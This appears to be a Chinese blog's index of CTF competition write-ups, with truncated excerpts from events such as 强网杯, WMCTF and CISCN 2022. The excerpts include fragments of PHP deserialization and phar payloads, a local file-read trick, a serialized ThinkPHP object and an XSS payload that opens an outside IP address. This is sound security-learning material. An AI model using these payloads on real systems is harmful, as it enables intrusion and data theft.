分类: 比赛wp

30 篇文章

第五空间2022wp
第五空间2022wp 收获颇丰,这次aurora把web给ak了,希望下次还能继往开来,勇攀高峰 5_web_BaliYun 签到题 /upload/ /www.zip 反序列化, 运行如下,保存为phar.jpg <?php class upload{ public $filename; } $a=new upload(); $a->…
wmctf2022部分题目复现
wmctf2022 java 比较快的解法 此解法在r3那里拿了3血 发现那个url栏目可以file协议读文件,随后尝试file:///时可以直接枚举当前目录下的文件, 直接可以知道文件名,此外,发现file:///proc/self/cmdline可以直接读到tomcat绝对路径,这样一来找其webapps目录下就可以找到源码(刚好有个war包可…
蓝帽杯2022部分wp
蓝帽杯2022部分wp [蓝帽杯2022]fatfree 一开始很快找到原题:2020国赛babyserialize 然后找到一条可以phpinfo的rce链 <?php namespace DB{ abstract class Cursor implements \IteratorAggregate {} } namespace DB\SQ…
[dasctf7月] 赋能赛 wp
[dasctf7月]newer 建议参考jacko神:https://www.wolai.com/7MymbpgzhHWMdAoh2Ycb89 这个题很快发现cookie处可以反序列化,但是也很快发现没啥可以rce 当时想的是反序列化原生类,但是很快想起实现不了 最后看了jacko神的wP,原来是composer.json { "requ…
强网杯2022 wp 部分(含有复现部分)
前言: 由于是大比赛还是开篇感慨两句。我对比赛题目的评价是赞不绝口。这次作为[纯情女色大学生]的队长,带领团队(基本上就我和2个web一个密码在做)完成了rcefile,babyweb,wp-um,polydiv,而ez_login,密码签到,ez_web差点出了,很是遗憾,再接再厉吧 [强网杯2022]rcefile 改content-type后…
diceCTF2022 部分wp
[diceCTF2022]pastebin https://www.freebuf.com/articles/web/245097.html 就是说呢,img一个标签符也可以自己闭合 payload paste=<img src="x" onerror=window.open('http://8.129.42.1…
2022鹏城杯线下决赛
2022鹏城杯线下决赛 前言 这是上周我在护网做网前工作的时候,被一群朋友拉去打的。由于他们进决赛圈也是意料之外,所以参赛选手没有过web攻击渗透的经验也正常,故最后责任到了我的身上。我们最后拿了第30名,混个优胜奖。赛后,随手一记。 以下是题目描述及我们当时的做法,也有不少是赛后交流wp的时候学到的姿势 水务 水务系统 内网地址 企业 典型企业网…
SEETF 2022 web 部分题解
[SEETF]Flag Portal (Flag 1) ruby服务端这里 elsif path == '/admin' params = req.params flagApi = params.fetch("backend", false) ? params.fetch("backend"…
国赛 线上初赛 ciscn 2022 web 部分wp
ciscn2022 ezpop payload http://eci-2ze7x0b01kqqb579phbs.cloudeci1.ichunqiu.com/index.php/index/test post a=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5…